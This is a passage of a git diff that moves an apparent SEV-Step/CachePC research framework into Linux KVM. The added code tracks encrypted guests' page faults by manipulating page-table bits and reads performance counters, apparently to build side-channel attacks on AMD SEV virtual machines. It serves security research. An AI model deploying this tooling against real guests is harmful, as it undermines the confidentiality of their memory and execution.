<linux/timekeeping.h> +#include <linux/uaccess.h> +#include <linux/types.h> +#include <linux/vmalloc.h> +#include <linux/printk.h> +#include <linux/ratelimit.h> + +#define ARRLEN(x) (sizeof(x)/sizeof((x)[0])) + +typedef struct { + bool is_active; + int tracking_type; + bool retrack; + + int perf_cpu; + + uint64_t gfn_retrack_backlog[10]; + int gfn_retrack_backlog_next_idx; + + page_fault_event_t * events; + uint64_t event_next_idx; + uint64_t events_size; + + bool error_occured; +} batch_track_state_t; + +typedef struct { + uint64_t idx_for_last_perf_reading; + uint64_t last_perf_reading; + uint64_t delta_valid_idx; + uint64_t delta; +} perf_state_t; + +// crude sync mechanism. don't know a good way to act on errors yet. +static uint64_t last_sent_event_id = 1; +static uint64_t last_acked_event_id = 1; +DEFINE_RWLOCK(event_lock); + +static page_fault_event_t sent_event; +static int have_event = 0; + +static bool get_rip = true; + +static int inited = 0; + +DEFINE_SPINLOCK(batch_track_state_lock); +static batch_track_state_t batch_track_state; + +static perf_state_t perf_state; + +static uint64_t perf_state_update_and_get_delta(uint64_t current_event_idx); + +void +sevstep_uspt_clear(void) +{ + write_lock(&event_lock); + inited = 0; + last_sent_event_id = 1; + last_acked_event_id = 1; + have_event = 0; + get_rip = false; + write_unlock(&event_lock); +} + +int +sevstep_uspt_initialize(int pid, bool should_get_rip) +{ + write_lock(&event_lock); + inited = 1; + last_sent_event_id = 1; + last_acked_event_id = 1; + have_event = 0; + get_rip = should_get_rip; + write_unlock(&event_lock); + + return 0; +} + +int +sevstep_uspt_is_initialiized() +{ + return inited; +} + +bool +sevstep_uspt_should_get_rip() +{ + bool tmp; + + read_lock(&event_lock); + tmp = get_rip; + read_unlock(&event_lock); + + return tmp; +} + +int +sevstep_uspt_send_and_block(uint64_t faulted_gpa, uint32_t error_code, + bool have_rip, uint64_t rip) +{ + ktime_t abort_after; + page_fault_event_t message_for_user; + + read_lock(&event_lock); + if (!sevstep_uspt_is_initialiized()) { + pr_warn("sevstep_uspt_send_and_block: ctx not initialized!\n"); + read_unlock(&event_lock); + return 1; + } + read_unlock(&event_lock); + + write_lock(&event_lock); + if (last_sent_event_id != last_acked_event_id) { + pr_warn("sevstep_uspt_send_and_block: " + "event id_s out of sync, aborting. Fix this later\n"); + write_unlock(&event_lock); + return 1; + } else { + // TODO: handle overflow + last_sent_event_id++; + } + message_for_user.id = last_sent_event_id; + message_for_user.faulted_gpa = faulted_gpa; + message_for_user.error_code = error_code; + message_for_user.have_rip_info = have_rip; + message_for_user.rip = rip; + message_for_user.ns_timestamp = ktime_get_real_ns(); + message_for_user.have_retired_instructions = false; + + // for poll based system; + have_event = 1; + sent_event = message_for_user; + // printk("sevstep_uspt_send_and_block sending event %llu\n", sent_event.id); + + write_unlock(&event_lock); + + // wait for ack, but with timeout. Otherwise small bugs in userland + // easily lead to a kernel hang + abort_after = ktime_get() + 1000000000ULL; // 1 sec in nanosecond + while (!sevstep_uspt_is_event_done(sent_event.id)) { + if (ktime_get() > abort_after) { + pr_warn("sevstep_uspt_send_and_block: " + "Waiting for ack of event %llu timed out, " + "continuing\n",sent_event.id); + return 3; + } + } + + return 0; +} + +int +sevstep_uspt_is_event_done(uint64_t id) +{ + int res; + + read_lock(&event_lock); + res = last_acked_event_id >= id; + read_unlock(&event_lock); + + return res; +} + +int +sevstep_uspt_handle_poll_event(page_fault_event_t* userpace_mem) +{ + int err; + + // most of the time we won't have an event + read_lock(&event_lock); + if (!have_event) { + read_unlock(&event_lock); + return KVM_USPT_POLL_EVENT_NO_EVENT; + } + read_unlock(&event_lock); + + write_lock(&event_lock); + if (have_event) { + err = copy_to_user(userpace_mem, + &sent_event, sizeof(page_fault_event_t)); + have_event = 0; + } else { + err = KVM_USPT_POLL_EVENT_NO_EVENT; + } + write_unlock(&event_lock); + + return err; +} + +int +sevstep_uspt_handle_ack_event_ioctl(ack_event_t event) +{ + int err = 0; + + write_lock(&event_lock); + if (event.id == last_sent_event_id) { + last_acked_event_id = last_sent_event_id; + } else { + err = 1; + pr_warn("sevstep_uspt_handle_ack_event_ioctl: " + "last sent event id is %llu but received ack for %llu\n", + last_sent_event_id, event.id); + } + write_unlock(&event_lock); + + return err; +} + +// get retired instructions between current_event_idx-1 and current_event_idx +// value is cached for multiple calls to the same current_event_idx +uint64_t +perf_state_update_and_get_delta(uint64_t current_event_idx) +{ + uint64_t current_value; + + /* check if value is "cached" */ + if (perf_state.delta_valid_idx == current_event_idx) { + if (current_event_idx == 0) { + perf_state.idx_for_last_perf_reading = current_event_idx; + perf_state.last_perf_reading = cachepc_read_pmc(0); + } + return perf_state.delta; + } + + /* otherwise update, but logic is only valid for two consecutive events */ + if (current_event_idx != perf_state.idx_for_last_perf_reading+1) { + pr_warn("perf_state_update_and_get_delta: " + "last reading was for idx %llu but was queried for %llu\n", + perf_state.idx_for_last_perf_reading, current_event_idx); + } + + current_value = cachepc_read_pmc(0); + perf_state.delta = (current_value - perf_state.last_perf_reading); + perf_state.delta_valid_idx = current_event_idx; + + perf_state.idx_for_last_perf_reading = current_event_idx; + perf_state.last_perf_reading = current_value; + + return perf_state.delta; +} + +void +sevstep_uspt_batch_tracking_inc_event_idx(void) +{ + spin_lock(&batch_track_state_lock); + batch_track_state.event_next_idx++; + spin_unlock(&batch_track_state_lock); +} + +int +sevstep_uspt_batch_tracking_start(int tracking_type,uint64_t expected_events, + int perf_cpu, bool retrack) +{ + page_fault_event_t* events; + uint64_t buffer_size, i; + + spin_lock(&batch_track_state_lock); + if (batch_track_state.is_active) { + pr_warn("sevstep_uspt_batch_tracking_start: " + "overwriting active batch track config!\n"); + if (batch_track_state.events != NULL ) { + vfree(batch_track_state.events); + } + } + batch_track_state.is_active = false; + spin_unlock(&batch_track_state_lock); + + buffer_size = expected_events * sizeof(page_fault_event_t); + pr_warn("sevstep_uspt_batch_tracking_start: " + "trying to alloc %llu bytes buffer for events\n", + buffer_size); + events = vmalloc(buffer_size); + if (events == NULL) { + pr_warn("sevstep_uspt_batch_tracking_start: " + "faperf_cpuiled to alloc %llu bytes for event buffer\n", + buffer_size); + return 1; // note: lock not held here + } + + // access each element once to force them into memory, improving performance + // during tracking + for (i = 0; i < expected_events * sizeof(page_fault_event_t); i++) { + ((volatile uint8_t*)events)[i] = 0; + } + + perf_state.idx_for_last_perf_reading = 0; + perf_state.last_perf_reading = 0; + perf_state.delta_valid_idx = 0; + perf_state.delta = 0; + cachepc_init_pmc(0, 0xc0, 0x00, PMC_GUEST, PMC_KERNEL | PMC_USER); + + spin_lock(&batch_track_state_lock); + + batch_track_state.perf_cpu = perf_cpu; + batch_track_state.retrack = retrack; + + batch_track_state.events = events; + batch_track_state.event_next_idx = 0; + batch_track_state.events_size = expected_events; + + batch_track_state.gfn_retrack_backlog_next_idx = 0; + batch_track_state.tracking_type = tracking_type; + batch_track_state.error_occured = false; + + batch_track_state.is_active = true; + + spin_unlock(&batch_track_state_lock); + + return 0; +} + +void +sevstep_uspt_batch_tracking_handle_retrack(struct kvm_vcpu* vcpu, + uint64_t current_fault_gfn) +{ + uint64_t ret_instr_delta; + int i, next_idx; + + spin_lock(&batch_track_state_lock); + + if (!batch_track_state.retrack) { + spin_unlock(&batch_track_state_lock); + return; + } + + if (smp_processor_id() != batch_track_state.perf_cpu) { + pr_warn("sevstep_uspt_batch_tracking_handle_retrack: perf was " + "programmed on logical cpu %d but handler was called " + "on %d. Did you forget to pin the vcpu thread?\n", + batch_track_state.perf_cpu, smp_processor_id()); + } + ret_instr_delta = perf_state_update_and_get_delta(batch_track_state.event_next_idx); + + // faulting instructions is probably the same as on last fault + // try to add current fault to retrack log and return + // for first event idx we do not have a valid ret_instr_delta. + // Retracking for the frist time is fine, if we loop, we end up here + // again but with a valid delta on one of the next event + if ((ret_instr_delta < 2) && ( batch_track_state.event_next_idx != 0)) { + next_idx = batch_track_state.gfn_retrack_backlog_next_idx; + if (next_idx >= ARRLEN(batch_track_state.gfn_retrack_backlog)) { + pr_warn("sevstep_uspt_batch_tracking_handle_retrack: " + "retrack backlog full, dropping retrack for fault " + "at 0x%llx\n", current_fault_gfn); + } else { + batch_track_state.gfn_retrack_backlog[next_idx] = current_fault_gfn; + batch_track_state.gfn_retrack_backlog_next_idx++; + } + + spin_unlock(&batch_track_state_lock); + return; + } + + /* made progress, retrack everything in backlog and reset idx */ + for (i = 0; i < batch_track_state.gfn_retrack_backlog_next_idx; i++) { + sevstep_track_single_page(vcpu, + batch_track_state.gfn_retrack_backlog[i], + batch_track_state.tracking_type); + } + + /* add current fault to list */ + batch_track_state.gfn_retrack_backlog[0] = current_fault_gfn; + batch_track_state.gfn_retrack_backlog_next_idx = 1; + + spin_unlock(&batch_track_state_lock); + +} + +int +sevstep_uspt_batch_tracking_save(uint64_t faulted_gpa, uint32_t error_code, + bool have_rip, uint64_t rip) +{ + uint64_t ret_instr_delta; + page_fault_event_t* event; + + spin_lock(&batch_track_state_lock); + + if (!batch_track_state.is_active) { + pr_warn("sevstep_uspt_batch_tracking_save: " + "got save but batch tracking is not active!\n"); + batch_track_state.error_occured = true; + spin_unlock(&batch_track_state_lock); + return 1; + } + + + if (batch_track_state.event_next_idx >= batch_track_state.events_size) { + pr_warn("sevstep_uspt_batch_tracking_save: events buffer is full!\n"); + batch_track_state.error_occured = true; + spin_unlock(&batch_track_state_lock); + return 1; + } + + if (smp_processor_id() != batch_track_state.perf_cpu) { + pr_warn("sevstep_uspt_batch_tracking_save: perf was " + "programmed on logical cpu %d but handler was called " + "on %d. Did you forget to pin the vcpu thread?\n", + batch_track_state.perf_cpu, smp_processor_id()); + } + ret_instr_delta = perf_state_update_and_get_delta(batch_track_state.event_next_idx); + + + if (batch_track_state.events == NULL) { + pr_warn("sevstep_uspt_batch_tracking_save: events buf was " + "NULL but \"is_active\" was set! This should never happen!!!\n"); + spin_unlock(&batch_track_state_lock); + return 1; + } + + event = &batch_track_state.events[batch_track_state.event_next_idx]; + event->id = batch_track_state.event_next_idx; + event->faulted_gpa = faulted_gpa; + event->error_code = error_code; + event->have_rip_info = have_rip; + event->rip = rip; + event->ns_timestamp = ktime_get_real_ns(); + event->have_retired_instructions = true; + event->retired_instructions = ret_instr_delta; + + // old inc was here + + if (batch_track_state.gfn_retrack_backlog_next_idx + > ARRLEN(batch_track_state.gfn_retrack_backlog)) { + pr_warn("sevstep_uspt_batch_tracking_save: " + "gfn retrack backlog overflow!\n"); + batch_track_state.error_occured = true; + spin_unlock(&batch_track_state_lock); + return 1; + } + + spin_unlock(&batch_track_state_lock); + + return 0; +} + +int +sevstep_uspt_batch_tracking_stop(page_fault_event_t* results, + uint64_t len, __u8* error_occured) +{ + spin_lock(&batch_track_state_lock); + if (!batch_track_state.is_active) { + pr_warn("sevstep_uspt: batch tracking not active\n"); + spin_unlock(&batch_track_state_lock); + return 1; + + } + batch_track_state.is_active = false; + + if (len > batch_track_state.event_next_idx) { + pr_warn("sevstep_uspt_batch_tracking_stop: " + "requested %llu events but got only %llu\n", + len, batch_track_state.event_next_idx); + spin_unlock(&batch_track_state_lock); + return 1; + } + + memcpy(results,batch_track_state.events, len*sizeof(page_fault_event_t)); + vfree(batch_track_state.events); + + *error_occured = batch_track_state.error_occured; + + spin_unlock(&batch_track_state_lock); + + return 0; +} + +uint64_t +sevstep_uspt_batch_tracking_get_events_count() +{ + uint64_t buf; + + spin_lock(&batch_track_state_lock); + buf = batch_track_state.event_next_idx; + spin_unlock(&batch_track_state_lock); + + return buf; +} + +bool +sevstep_uspt_batch_tracking_in_progress() +{ + return batch_track_state.is_active; +} diff --git a/sevstep/uspt.h b/cachepc/uspt.h diff --git a/patch.diff b/patch.diff @@ -1,5 +1,5 @@ diff --git a/arch/x86/include/asm/kvm_page_track.h b/arch/x86/include/asm/kvm_page_track.h -index eb186bc57f6a..3f767a27045e 100644 +index eb186bc57f6a..b96e80934005 100644 --- a/arch/x86/include/asm/kvm_page_track.h +++ b/arch/x86/include/asm/kvm_page_track.h @@ -2,10 +2,9 @@ @@ -12,12 +12,12 @@ index eb186bc57f6a..3f767a27045e 100644 -}; +#include<linux/srcu.h> + -+#include "../../kvm/sevstep/uapi.h" ++#include "../../kvm/cachepc/uapi.h" /* * The notifier represented by @kvm_page_track_notifier_node is linked into diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile -index 30f244b64523..3c5f65040878 100644 +index 30f244b64523..e0eeffd340e8 100644 --- a/arch/x86/kvm/Makefile +++ b/arch/x86/kvm/Makefile @@ -1,6 +1,6 @@ @@ -35,8 +35,8 @@ index 30f244b64523..3c5f65040878 100644 - hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o \ - mmu/spte.o + hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o mmu/spte.o \ -+ svm/cachepc/cachepc.o svm/cachepc/kvm.o \ -+ sevstep/sevstep.o sevstep/uspt.o ++ cachepc/cachepc.o cachepc/kvm.o \ ++ cachepc/sevstep.o cachepc/uspt.o ifdef CONFIG_HYPERV kvm-y += kvm_onhyperv.o @@ -45,20 +45,20 @@ index 30f244b64523..3c5f65040878 100644 kvm-intel-$(CONFIG_X86_SGX_KVM) += vmx/sgx.o -kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o -+kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o \ -+ svm/cachepc/cachepc.o ++kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o \ ++ svm/avic.o svm/sev.o cachepc/cachepc.o ifdef CONFIG_HYPERV kvm-amd-y += svm/svm_onhyperv.o diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c -index d871b8dee7b3..32900ef5ee0b 100644 +index d871b8dee7b3..3b7720aebbc6 100644 --- a/arch/x86/kvm/mmu/mmu.c +++ b/arch/x86/kvm/mmu/mmu.c @@ -1152,6 +1152,8 @@ static void drop_large_spte(struct kvm_vcpu *vcpu, u64 *sptep) } } -+#include "../sevstep/mmu.c" ++#include "../cachepc/mmu.c" + /* * Write-protect on the specified @sptep, @pt_protect indicates whether @@ -154,14 +154,14 @@ index d871b8dee7b3..32900ef5ee0b 100644 return false; } diff --git a/arch/x86/kvm/mmu/page_track.c b/arch/x86/kvm/mmu/page_track.c -index 2e09d1b6249f..17b69a1f2b40 100644 +index 2e09d1b6249f..9b40e71564bf 100644 --- a/arch/x86/kvm/mmu/page_track.c +++ b/arch/x86/kvm/mmu/page_track.c @@ -19,6 +19,8 @@ #include "mmu.h" #include "mmu_internal.h" -+#include "../sevstep/sevstep.h" ++#include "../cachepc/sevstep.h" + bool kvm_page_track_write_tracking_enabled(struct kvm *kvm) { @@ -180,22 +180,6 @@ index 2e09d1b6249f..17b69a1f2b40 100644 } EXPORT_SYMBOL_GPL(kvm_slot_page_track_add_page); -diff --git a/arch/x86/kvm/sevstep b/arch/x86/kvm/sevstep -new file mode 120000 -index 000000000000..642ea24bf098 ---- /dev/null -+++ b/arch/x86/kvm/sevstep -@@ -0,0 +1 @@ -+/home/louis/kvm-prime-count/sevstep -\ No newline at end of file -diff --git a/arch/x86/kvm/svm/cachepc b/arch/x86/kvm/svm/cachepc -new file mode 120000 -index 000000000000..9119e44af1f0 ---- /dev/null -+++ b/arch/x86/kvm/svm/cachepc -@@ -0,0 +1 @@ -+/home/louis/kvm-prime-count/cachepc -\ No newline at end of file diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c index cf0bf456d520..4dbb8041541f 100644 --- a/arch/x86/kvm/svm/svm.c @@ -382,14 +366,14 @@ index dfaeb47fcf2a..0626f3fdddfd 100644 2: cli diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c -index d9adf79124f9..082dc8553566 100644 +index d9adf79124f9..3e5c55f9bef0 100644 --- a/arch/x86/kvm/x86.c +++ b/arch/x86/kvm/x86.c @@ -82,6 +82,8 @@ #include <asm/sgx.h> #include <clocksource/hyperv_timer.h> -+#include "sevstep/sevstep.h" ++#include "cachepc/sevstep.h" + #define CREATE_TRACE_POINTS #include "trace.h" @@ -427,21 +411,29 @@ index e089fbf9017f..7899e1efe852 static int __sev_init_locked(int *error) { diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c -index f2a63cb2658b..bd26b7a29c9e 100644 +index f2a63cb2658b..0d1c1d8c72ea 100644 --- a/virt/kvm/kvm_main.c +++ b/virt/kvm/kvm_main.c -@@ -70,6 +70,10 @@ +@@ -13,6 +13,7 @@ + * Yaniv Kamay <yaniv@qumranet.com> + */ + ++#include <asm-generic/errno-base.h> + #include <kvm/iodev.h> + + #include <linux/kvm_host.h> +@@ -70,6 +71,10 @@ /* Worst case buffer size needed for holding an integer. */ #define ITOA_MAX_LEN 12 -+#include "../../arch/x86/kvm/svm/cachepc/kvm.h" -+#include "../../arch/x86/kvm/sevstep/sevstep.h" -+#include "../../arch/x86/kvm/sevstep/uspt.h" ++#include "../../arch/x86/kvm/cachepc/kvm.h" ++#include "../../arch/x86/kvm/cachepc/sevstep.h" ++#include "../../arch/x86/kvm/cachepc/uspt.h" + MODULE_AUTHOR("Qumranet"); MODULE_LICENSE("GPL"); -@@ -159,6 +163,267 @@ static unsigned long long kvm_active_vms; +@@ -159,6 +164,267 @@ static unsigned long long kvm_active_vms; static DEFINE_PER_CPU(cpumask_var_t, cpu_kick_mask); @@ -709,7 +701,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 __weak void kvm_arch_mmu_notifier_invalidate_range(struct kvm *kvm, unsigned long start, unsigned long end) { -@@ -1261,6 +1526,9 @@ static void kvm_destroy_vm(struct kvm *kvm) +@@ -1261,6 +1527,9 @@ static void kvm_destroy_vm(struct kvm *kvm) hardware_disable_all(); mmdrop(mm); module_put(kvm_chardev_ops.owner); @@ -719,7 +711,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 } void kvm_get_kvm(struct kvm *kvm) -@@ -1360,7 +1628,7 @@ static void kvm_insert_gfn_node(struct kvm_memslots *slots, +@@ -1360,7 +1629,7 @@ static void kvm_insert_gfn_node(struct kvm_memslots *slots, int idx = slots->node_idx; parent = NULL; @@ -728,7 +720,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 struct kvm_memory_slot *tmp; tmp = container_of(*node, struct kvm_memory_slot, gfn_node[idx]); -@@ -4823,6 +5091,9 @@ static int kvm_dev_ioctl_create_vm(unsigned long type) +@@ -4823,6 +5092,9 @@ static int kvm_dev_ioctl_create_vm(unsigned long type) kvm_uevent_notify_change(KVM_EVENT_CREATE_VM, kvm); fd_install(r, file); @@ -738,7 +730,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 return r; put_kvm: -@@ -4836,6 +5107,315 @@ static long kvm_dev_ioctl(struct file *filp, +@@ -4836,6 +5108,315 @@ static long kvm_dev_ioctl(struct file *filp, long r = -EINVAL; switch (ioctl) { @@ -1054,7 +1046,18 @@ index f2a63cb2658b..bd26b7a29c9e 100644 case KVM_GET_API_VERSION: if (arg) goto out; -@@ -5792,6 +6372,8 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, +@@ -4864,7 +5445,9 @@ static long kvm_dev_ioctl(struct file *filp, + r = -EOPNOTSUPP; + break; + default: +- return kvm_arch_dev_ioctl(filp, ioctl, arg); ++ //r = cachepc_kvm_ioctl(filp, ioctl, arg); ++ //if (r == -EINVAL) ++ return kvm_arch_dev_ioctl(filp, ioctl, arg); + } + out: + return r; +@@ -5792,6 +6375,8 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, r = kvm_vfio_ops_init(); WARN_ON(r); @@ -1063,7 +1066,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 return 0; out_unreg: -@@ -5821,6 +6403,8 @@ void kvm_exit(void) +@@ -5821,6 +6406,8 @@ void kvm_exit(void) { int cpu; diff --git a/sevstep/mmu.c b/sevstep/mmu.c @@ -1,135 +0,0 @@ -#include "../sevstep/sevstep.h" -#include "../sevstep/uspt.h" - -static void -sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, - struct kvm_page_fault *fault) -{ - const int modes[] = { - KVM_PAGE_TRACK_WRITE, - KVM_PAGE_TRACK_ACCESS, - KVM_PAGE_TRACK_EXEC - }; - uint64_t current_rip; - bool was_tracked; - int have_rip, i; - int send_err; - - was_tracked = false; - for (i = 0; i < sizeof(modes) / sizeof(modes[0]); i++) { - if (kvm_slot_page_track_is_active(vcpu->kvm, - fault->slot, fault->gfn, modes[i])) { - sevstep_untrack_single_page(vcpu, fault->gfn, modes[i]); - was_tracked = true; - } - } - - if (was_tracked) { - have_rip = false; - if (sevstep_uspt_should_get_rip()) - have_rip = sevstep_get_rip_kvm_vcpu(vcpu, &current_rip) == 0; - if (sevstep_uspt_batch_tracking_in_progress()) { - send_err = sevstep_uspt_batch_tracking_save(fault->gfn << PAGE_SHIFT, - fault->error_code, have_rip, current_rip); - if (send_err) { - printk_ratelimited( - "sevstep_uspt_batch_tracking_save failed with %d\n" - "##########################\n", send_err); - } - sevstep_uspt_batch_tracking_handle_retrack(vcpu, fault->gfn); - sevstep_uspt_batch_tracking_inc_event_idx(); - } else { - send_err = sevstep_uspt_send_and_block(fault->gfn << PAGE_SHIFT, - fault->error_code, have_rip, current_rip); - if (send_err) { - printk("sevstep_uspt_send_and_block failed with %d\n" - "##########################\n", send_err); - } - } - } -} - -bool -sevstep_spte_protect(u64 *sptep, bool pt_protect, enum kvm_page_track_mode mode) -{ - u64 spte; - bool flush; - - spte = *sptep; - if (!is_writable_pte(spte) && !(pt_protect && is_mmu_writable_spte(spte))) - return false; - - rmap_printk("spte %p %llx\n", sptep, *sptep); - - if (pt_protect) - spte &= ~EPT_SPTE_MMU_WRITABLE; - - flush = false; - if (mode == KVM_PAGE_TRACK_WRITE) { - spte = spte & ~PT_WRITABLE_MASK; - flush = true; - } else if (mode == KVM_PAGE_TRACK_RESET_ACCESSED) { - spte = spte & ~PT_ACCESSED_MASK; - } else if (mode == KVM_PAGE_TRACK_ACCESS) { - spte = spte & ~PT_PRESENT_MASK; - spte = spte & ~PT_WRITABLE_MASK; - spte = spte & ~PT_USER_MASK; - spte = spte | (0x1ULL << PT64_NX_SHIFT); - flush = true; - } else if (mode == KVM_PAGE_TRACK_EXEC) { - spte = spte | (0x1ULL << PT64_NX_SHIFT); - flush = true; - } else if (mode == KVM_PAGE_TRACK_RESET_EXEC) { - spte = spte & ~(0x1ULL << PT64_NX_SHIFT); - flush = true; - } else { - printk(KERN_WARNING "spte_protect was called with invalid mode" - "parameter %d\n",mode); - } - flush |= mmu_spte_update(sptep, spte); - - return flush; -} -EXPORT_SYMBOL(sevstep_spte_protect); - -bool sevstep_rmap_protect(struct kvm_rmap_head *rmap_head, - bool pt_protect, enum kvm_page_track_mode mode) -{ - u64 *sptep; - struct rmap_iterator iter; - bool flush = false; - - for_each_rmap_spte(rmap_head, &iter, sptep) { - flush |= sevstep_spte_protect(sptep, pt_protect, mode); - } - - return flush; -} -EXPORT_SYMBOL(sevstep_rmap_protect); - -bool -sevstep_kvm_mmu_slot_gfn_protect(struct kvm *kvm, struct kvm_memory_slot *slot, - uint64_t gfn, int min_level, enum kvm_page_track_mode mode) -{ - struct kvm_rmap_head *rmap_head; - bool protected; - int i; - - protected = false; - - if (kvm_memslots_have_rmaps(kvm)) { - for (i = min_level; i <= KVM_MAX_HUGEPAGE_LEVEL; ++i) { - rmap_head = gfn_to_rmap(gfn, i, slot); - protected |= sevstep_rmap_protect(rmap_head, true, mode); - } - } - - if (is_tdp_mmu_enabled(kvm)) { - protected |= kvm_tdp_mmu_write_protect_gfn(kvm, - slot, gfn, min_level); - } - - return protected; -} -EXPORT_SYMBOL(sevstep_kvm_mmu_slot_gfn_protect); - diff --git a/sevstep/sevstep.c b/sevstep/sevstep.c @@ -1,263 +0,0 @@ -#include "sevstep.h" -#include "svm/cachepc/cachepc.h" - -#include "mmu/mmu_internal.h" -#include "mmu.h" - -#include "irq.h" -#include "ioapic.h" -#include "mmu.h" -#include "mmu/tdp_mmu.h" -#include "x86.h" -#include "kvm_cache_regs.h" -#include "kvm_emulate.h" -#include "cpuid.h" -#include "mmu/spte.h" - -#include <linux/kvm_host.h> -#include <linux/types.h> -#include <linux/string.h> -#include <linux/mm.h> -#include <linux/highmem.h> -#include <linux/moduleparam.h> -#include <linux/export.h> -#include <linux/swap.h> -#include <linux/hugetlb.h> -#include <linux/compiler.h> -#include <linux/srcu.h> -#include <linux/slab.h> -#include <linux/sched/signal.h> -#include <linux/uaccess.h> -#include <linux/hash.h> -#include <linux/kern_levels.h> -#include <linux/kthread.h> -#include <linux/sev.h> -#include <linux/mm.h> -#include <linux/smp.h> -#include <linux/vmalloc.h> -#include <linux/slab.h> -#include <linux/sched.h> - -#include "kvm_cache_regs.h" -#include "svm/svm.h" - -struct kvm* main_vm; -EXPORT_SYMBOL(main_vm); - -bool -sevstep_track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, - enum kvm_page_track_mode mode) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - - if (mode == KVM_PAGE_TRACK_ACCESS) { - pr_warn("Adding gfn: %016llx to access page track pool\n", gfn); - } - - if (mode == KVM_PAGE_TRACK_WRITE) { - pr_warn("Adding gfn: %016llx to write page track pool\n", gfn); - } - - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm,slot, gfn, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_add_page(vcpu->kvm, slot, gfn, mode); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } else { - pr_warn("Failed to track %016llx because ", gfn); - if (slot == NULL) { - printk(KERN_CONT "slot was null"); - } - if (kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - printk(KERN_CONT "page is already tracked"); - } - printk(KERN_CONT "\n"); - } - - srcu_read_unlock(&vcpu->kvm->srcu, idx); - - return ret; -} -EXPORT_SYMBOL(sevstep_track_single_page); - -bool -sevstep_untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, - enum kvm_page_track_mode mode) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - - if (mode == KVM_PAGE_TRACK_ACCESS) { - pr_warn("Removing gfn: %016llx from acess page track pool\n", gfn); - } - if (mode == KVM_PAGE_TRACK_WRITE) { - pr_warn("Removing gfn: %016llx from write page track pool\n", gfn); - } - - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_remove_page(vcpu->kvm, slot, gfn, mode); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } else { - pr_warn("Failed to untrack %016llx because ", gfn); - if (slot == NULL) { - printk(KERN_CONT "slot was null"); - } else if (!kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - printk(KERN_CONT "page track was not active"); - } - printk(KERN_CONT "\n"); - } - - srcu_read_unlock(&vcpu->kvm->srcu, idx); - - return ret; -} -EXPORT_SYMBOL(sevstep_untrack_single_page); - -bool -sevstep_reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL) { - write_lock(&vcpu->kvm->mmu_lock); - // Vincent: The kvm mmu function now requires min_level - // We want all pages to protected so we do PG_LEVEL_4K - // https:// patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ - sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, - PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_ACCESSED); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } - - srcu_read_unlock(&vcpu->kvm->srcu, idx); - - return ret; -} -EXPORT_SYMBOL(sevstep_reset_accessed_on_page); - -bool -sevstep_clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL) { - write_lock(&vcpu->kvm->mmu_lock); - // Vincent: The kvm mmu function now requires min_level - // We want all pages to protected so we do PG_LEVEL_4K - // https:// patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ - sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, - PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_EXEC); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } - - srcu_read_unlock(&vcpu->kvm->srcu, idx); - - return ret; -} -EXPORT_SYMBOL(sevstep_clear_nx_on_page); - -long -sevstep_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) -{ - struct kvm_memory_slot *slot; - struct kvm_memory_slot *first_memslot; - struct rb_node *node; - u64 iterator, iterat_max; - long count = 0; - int idx; - - // Vincent: Memslots interface changed into a rb tree, see - // here: https:// lwn.net/Articles/856392/ - // and here: https:// lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u - // Thus we use instead of - // iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn - // + 